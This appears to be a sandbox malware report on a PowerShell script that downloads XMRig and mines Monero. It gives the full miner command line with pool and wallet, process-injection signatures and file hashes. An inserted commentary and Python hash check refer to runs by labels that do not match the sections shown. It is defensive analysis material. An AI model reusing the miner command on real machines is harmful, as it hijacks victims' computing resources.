memory/2056-138-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-139-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-140-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-141-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-142-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-143-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-144-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-145-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-146-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-147-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-148-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-149-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-150-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-151-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-152-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-153-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-154-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-155-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-156-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
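Two kinds of file hashes appear in this run and the one before it. xmrig.exe has the same SHA-256 in every run, so that digest is a stable indicator for this campaign's payload, with the caveat that, given the xmrig-6.21.3 path and the GitHub download, it is most likely the stock release build and will also match legitimate miners. The __PSScriptPolicyTest_*.ps1 files are written by PowerShell itself when it checks whether an AppLocker/WDAC policy puts it into lockdown (constrained language) mode; they are not dropped by the script and should not go on a blocklist. The behavioral14 digests (c4ca4238..., 356a192b..., 6b86b273...) are simply those of the one-byte content "1", which the added example below verifies by recomputation. The example is not part of the report, and the candidate file contents it tries are constructed guesses.

```python
"""Check what the reported file hashes identify before using them as IOCs.

Added example, not part of the sandbox report. The digests below are copied
from the Files sections of the behavioral11/14/15 runs; the candidate file
contents are constructed guesses, and which (if any) matches is established
by recomputation here rather than stated by the report.
"""
from __future__ import annotations

import hashlib

ALGOS = ("md5", "sha1", "sha256", "sha512")

# xmrig.exe SHA-256 as reported by each behavioral run
XMRIG_SHA256 = {
    "behavioral11": "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda",
    "behavioral14": "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda",
    "behavioral15": "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda",
}

# __PSScriptPolicyTest_*.ps1: behavioral11 and behavioral15 agree, behavioral14 differs
PSPOLICY_B11 = {"md5": "d17fe0a3f47be24a6453e9ef58c94641",
                "sha1": "6ab83620379fc69f80c0242105ddffd7d98d5d9d",
                "sha256": "96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7"}
PSPOLICY_B14 = {"md5": "c4ca4238a0b923820dcc509a6f75849b",
                "sha1": "356a192b7913b04c54574d18c28d46e6395428ab",
                "sha256": "6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b",
                "sha512": "4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a"}

CANDIDATES = {  # constructed guesses at a trivial policy-test script body
    "single byte '1'": b"1",
    "'1' + LF": b"1\n",
    "'1' + CRLF": b"1\r\n",
    "empty file": b"",
}


def digests(data: bytes) -> dict[str, str]:
    return {a: hashlib.new(a, data).hexdigest() for a in ALGOS}


def matches(data: bytes, reported: dict[str, str]) -> bool:
    """True only if every algorithm the report lists agrees with recomputation."""
    actual = digests(data)
    return bool(reported) and all(actual[a] == v.lower() for a, v in reported.items())


def identify(reported: dict[str, str]) -> str | None:
    """Name the candidate whose content reproduces all reported digests, else None."""
    for label, data in CANDIDATES.items():
        if matches(data, reported):
            return label
    return None


def stable_across_runs(per_run: dict[str, str]) -> bool:
    """A hash is only a usable IOC if the same binary turned up in every run."""
    return len({v.lower() for v in per_run.values()}) == 1


if __name__ == "__main__":
    print("xmrig.exe identical in all runs:", stable_across_runs(XMRIG_SHA256))
    print("behavioral14 policy-test file is:", identify(PSPOLICY_B14))
    print("behavioral11 policy-test file is:", identify(PSPOLICY_B11))
```

The behavioral11/15 policy-test file does not match any of the trivial candidates, so its content is left unknown rather than guessed; the point of the check is that a digest only becomes an indicator once you know what it is a digest of.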
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:44
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1757s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 64 hits; indicator, process and target fields are all N/A in this export | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4696 wrote to memory of 4468 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4696 wrote to memory of 4468 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
Files
memory/4696-0-0x00007FFD5B973000-0x00007FFD5B975000-memory.dmp
memory/4696-1-0x000002ACAC7C0000-0x000002ACAC7E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pp5ldoed.tlp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4696-11-0x00007FFD5B970000-0x00007FFD5C431000-memory.dmp
memory/4696-12-0x00007FFD5B970000-0x00007FFD5C431000-memory.dmp
memory/4696-14-0x00007FFD5B970000-0x00007FFD5C431000-memory.dmp
memory/4696-15-0x000002ACAED50000-0x000002ACAED62000-memory.dmp
memory/4696-16-0x000002ACAED30000-0x000002ACAED3A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4468-47-0x0000017569D50000-0x0000017569D70000-memory.dmp
memory/4468-48-0x00000175FDAC0000-0x00000175FDAE0000-memory.dmp
memory/4468-49-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-52-0x00000175FE150000-0x00000175FE170000-memory.dmp
memory/4468-51-0x00000175FE130000-0x00000175FE150000-memory.dmp
memory/4468-50-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4696-53-0x00007FFD5B973000-0x00007FFD5B975000-memory.dmp
memory/4696-54-0x00007FFD5B970000-0x00007FFD5C431000-memory.dmp
memory/4468-55-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-56-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-58-0x00000175FE150000-0x00000175FE170000-memory.dmp
memory/4468-57-0x00000175FE130000-0x00000175FE150000-memory.dmp
memory/4468-59-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-60-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-61-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-62-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-63-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-64-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-65-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-66-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-67-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-68-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-69-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-70-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-71-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-72-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-73-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-74-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-75-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-76-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-77-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-78-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-79-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-80-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-81-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-82-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-83-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-84-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-85-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-86-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-87-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-88-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-89-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-90-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-91-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-92-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-93-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-94-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-95-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-96-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-97-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-98-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-99-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-100-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-101-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-102-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-103-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-104-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-105-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-106-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-107-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-108-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-109-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-110-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-111-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-112-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-113-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-114-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-115-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-116-0x00007FF707D10000-0x00007FF708943000-memory.dmp
memory/4468-117-0x00007FF707D10000-0x00007FF708943000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:46
Platform
win10-20240404-en
Max time kernel
1795s
Max time network
1775s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3052 wrote to memory of 2708 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3052 wrote to memory of 2708 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.197.79.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/3052-0-0x00007FFFCCAA3000-0x00007FFFCCAA4000-memory.dmp
memory/3052-5-0x000001FB6CE70000-0x000001FB6CE92000-memory.dmp
memory/3052-8-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp
memory/3052-9-0x000001FB6CF20000-0x000001FB6CF96000-memory.dmp
memory/3052-10-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3wf030tf.cs0.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3052-25-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp
memory/3052-48-0x000001FB6D0C0000-0x000001FB6D0D2000-memory.dmp
memory/3052-61-0x000001FB6CF10000-0x000001FB6CF1A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2708-90-0x0000018469D10000-0x0000018469D30000-memory.dmp
memory/3052-91-0x00007FFFCCAA3000-0x00007FFFCCAA4000-memory.dmp
memory/2708-92-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/3052-93-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp
memory/2708-94-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-95-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-96-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-97-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-98-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-99-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-100-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-101-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-102-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-103-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-104-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-105-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-106-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-107-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-108-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-109-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-110-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-111-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-112-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-113-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-114-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-115-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-116-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-117-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-118-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-119-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-120-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-121-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-122-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-123-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-124-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-125-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-126-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-127-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-128-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-129-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-130-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-131-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-132-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-133-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-134-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-135-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-136-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-137-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-138-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-139-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-140-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-141-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-142-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-143-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-144-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-145-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-146-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-147-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-148-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-149-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-150-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-151-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-152-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-153-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-154-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
memory/2708-155-0x00007FF6DFB40000-0x00007FF6E0773000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:46
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1784s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
